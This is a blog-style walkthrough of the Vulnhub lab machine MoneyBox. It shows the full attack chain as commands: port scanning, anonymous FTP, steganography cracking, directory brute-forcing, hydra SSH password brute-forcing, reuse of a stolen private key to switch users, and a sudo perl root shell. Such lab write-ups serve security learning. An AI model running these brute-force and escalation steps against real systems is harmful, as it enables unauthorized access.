MoneyBox Walkthrough – Vulnhub – Writeup

MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so. “MoneyBox Walkthrough – Vulnhub – Writeup”.

LInk to the machine: https://www.vulnhub.com/entry/moneybox-1,653/

Walkthrough of Alfa

From this machine, we can learn:

  1. Basic enumeration of HTTP
  2. Steganography using steghide
  3. Basics of SSH
  4. Abuse sudo to get root privilege escalation

Identify the target

First of all, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, I scanned the open ports to identify the exposed services.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53

Here, we can see that we have anonymous FTP access. So, I logged into FTP.

Anonymous FTP access

lftp -u anonymous, 10.0.2.53

I downloaded the image to my local machine. Then, I tried extracting data using steghide and without a password but it gave me nothing.

steghide extract -sf trytofind.jpg

I also tried bruteforcing the password, it didn’t give me anything.

stegseek trytofind.jpg /home/kali/rockyou.txt

So, I might have to get the password for the steganography.

Enumerate the webserver

The default page doesn’t give anything.

When I brute-forced the directory on the webserver, I found a path.

gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log

Upon curling the path, I found a hint.

curl -L 10.0.2.53/blogs

The path had a comment that suggested I visit a new path.

curl -L 10.0.2.53/S3cr3t-T3xt

Here, we got the secret key that I could use to use in the steganography.

Steganography

Steganography is the way to hide data inside different files. Since we have an image of the extension jpg, we can guess that the image has used steghide for the steganography.

steghide extract -sf trytofind.jpg 

It wrote to a new file “data.txt”. The file had a hint for a username on the target.

cat data.txt
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

The file gives us the username as “renu”. Also, the password is weak. Therefore, we might want to bruteforce the password.

Bruteforce

hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh

We were able to crack the password. Hence, I logged in as renu and got the user flag.

ssh renu@10.0.2.53
ls -al
cat user1.txt

Escalate to different user

When I listed the home directories, I found another user on the machine.

cd /home
ls -al

On the home page of lily, there is an SSH directory.

cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys

The SSH directory has a file authorized_keys that had the public SSH key of the user renu. This means, using the private key of the user, we can log as lily. There are two ways to do so. First, we can copy the private key of renu to our local machine and log into SSH from the local machine.

scp renu@10.0.2.53:~/.ssh/id_rsa .

The above command will copy the id_rsa and its permissions. This is a better way than serving via an HTTP server. Now, we can log in.

ssh lily@10.0.2.53 -i .ssh/id_rsa

Alternatively, we can also switch to lily from the target machine itself.

cd
ssh lily@localhost -i .ssh/id_rsa

From here, we can get the user flag.

cat user2.txt

Root privilege escalation

From lily, we can check the sudo permissions.

sudo -l

We can see that the user can run perl command as all users. Therefore, we can now execute commands as any user.

References: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt

Leave a comment